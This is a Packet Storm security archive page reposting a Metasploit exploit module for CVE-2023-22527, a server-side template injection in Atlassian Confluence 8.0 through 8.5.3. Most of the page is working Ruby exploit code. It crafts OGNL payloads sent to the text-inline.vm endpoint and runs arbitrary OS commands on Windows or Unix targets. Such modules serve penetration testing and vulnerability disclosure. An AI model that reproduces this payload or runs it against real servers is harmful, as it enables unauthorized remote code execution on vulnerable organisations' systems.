what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Atlassian Confluence SSTI Injection

Atlassian Confluence SSTI Injection
Posted Jan 26, 2024
Authored by Spencer McIntyre, Harsh Jaiswal, Rahul Maini | Site metasploit.com

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

tags | exploit, web
advisories | CVE-2023-22527
SHA-256 | 39194aa16a97418685a42e7cf82542a18f6236bb69aa758c9c1945fa2ea34f1e

Atlassian Confluence SSTI Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence SSTI Injection',
'Description' => %q{
This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses
the injection to evaluate an OGNL expression resulting in OS command execution.
Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.
},
'Author' => [
'Rahul Maini', # ProjectDiscovery analysis
'Harsh Jaiswal', # ProjectDiscovery analysis
'Spencer McIntyre'
],
'References' => [
['CVE', '2023-22527'],
['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],
['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']
],
'DisclosureDate' => '2024-01-16', # Atlassian advisory released
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD
}
],
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Payload' => { 'Space' => 8191, 'DisableNops' => true }
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8090
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def get_confluence_platform
# this method gets the platform by exploiting CVE-2023-22527
return @confluence_platform if @confluence_platform

header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
@org.apache.struts2.ServletActionContext@getResponse().setHeader(
'#{header}',
(@java.lang.System@getProperty('os.name'))
)
OGNL
res = inject_ognl(ognl)
return nil unless res

res.headers[header]
end

def check
confluence_version = get_confluence_version
return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version

vprint_status("Detected Confluence version: #{confluence_version}")
if confluence_version > Rex::Version.new('8.5.3')
return CheckCode::Safe("Version #{confluence_version} is not affected.")
end

confluence_platform = get_confluence_platform
unless confluence_platform
return CheckCode::Safe('Failed to test OGNL injection.')
end

vprint_status("Detected target platform: #{confluence_platform}")
CheckCode::Vulnerable('Successfully tested OGNL injection.')
end

def exploit
confluence_platform = get_confluence_platform
unless confluence_platform
fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
end

unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
end

print_status("Executing #{payload_instance.refname} (#{target.name})")
execute_command(payload.encoded)
end

def execute_command(cmd, _opts = {})
param = rand_text_alphanumeric(6..10)
# reference a parameter in the OGNL to work around the 200 character length limit
ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
(new freemarker.template.utility.Execute()).exec(
{@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}
)
OGNL

if target['Platform'] == 'win'
vars_post = { param => "cmd.exe /c \"#{cmd}\"" }
else
# the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads
# see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1
vars_post = { param => "sh -c $@|sh . echo #{cmd}" }
end

inject_ognl(ognl, 'vars_post' => vars_post)
end

def inject_ognl(ognl, opts = {})
opts = opts.clone
param = rand_text_alphanumeric(6..10)
final_opts = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),
'vars_post' => {
# label and param are both limited to a 200 character length by default
'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",
param => ognl
}.merge(opts.delete('vars_post') || {})
}.merge(opts)

send_request_cgi(final_opts)
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close